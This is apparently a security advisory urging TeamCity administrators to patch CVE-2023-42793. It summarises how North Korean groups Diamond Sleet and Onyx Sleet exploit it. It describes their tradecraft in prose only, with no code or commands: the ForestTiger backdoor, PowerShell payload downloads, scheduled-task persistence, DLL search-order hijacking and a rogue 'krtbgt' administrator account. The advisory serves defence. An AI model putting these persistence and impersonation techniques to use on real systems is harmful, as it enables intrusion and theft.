Take action: Time for an urgent action. Lock down your TeamCity server from the internet if possible. And patch. NOW.
Or get hacked and waste a bunch of time and stress to report incidents, change all secrets and review code in a hacked CI/CD.
Diamond Sleet and Onyx Sleet, North Korean state-sponsored hacker groups are currently exploiting a critical remote code execution vulnerability in JetBrains TeamCity server, posing a significant threat to the DevSecOps tool. TeamCity is a widely used CI/CD server with over 30,000 users, including major organizations like Nike, Ferrari, Citibank, and Ubisoft, making it an attractive target for threat actors.
This vulnerability, tracked as CVE-2023-42793, allows unauthenticated attackers to execute arbitrary code on the TeamCity on-premises server, potentially leading to source code theft, exposure of service secrets, and compromise of private keys.
Crime group profile and atack details:
- Diamond Sleet, one of the North Korean threat actors involved, has a history of targeting media, IT services, and defense-related entities worldwide, prioritizing activities such as espionage, data theft, financial gain, and network disruption. This group has previously targeted security researchers, weaponized open-source software, and conducted supply chain compromises. Their attack involves the use of a backdoor named "ForestTiger" (Forest64.exe) by Diamond Sleet. Once TeamCity servers are compromised, PowerShell is used to download payloads, including the backdoor and a malware configuration file, from previously compromised infrastructure. ForestTiger creates a scheduled task to run on system startup. Additionally, malicious DLLs are downloaded and staged with legitimate .exe files to carry out DLL search-order hijacking.
- Onyx Sleet, another North Korean nation-state actor, primarily focuses on defense and IT services organizations in South Korea, the United States, and India. It employs in-house-developed tools to establish persistent access to victim environments and evade detection. Onyx Sleet leverages the TeamCity exploit to create a new user account named "krtbgt" on compromised systems, likely attempting to impersonate the legitimate Windows account name "KRBTGT." This user account is added to the local administrators group, granting it privileges to execute various system discovery commands on compromised systems. Furthermore, a unique payload is deployed via PowerShell, enabling persistent connections between the compromised host and attacker-controlled infrastructure.
Microsoft observed attackers using the "krtbgt" account to access the compromised device via remote desktop protocol and also attempting to prevent other hackers from exploiting the TeamCity vulnerability.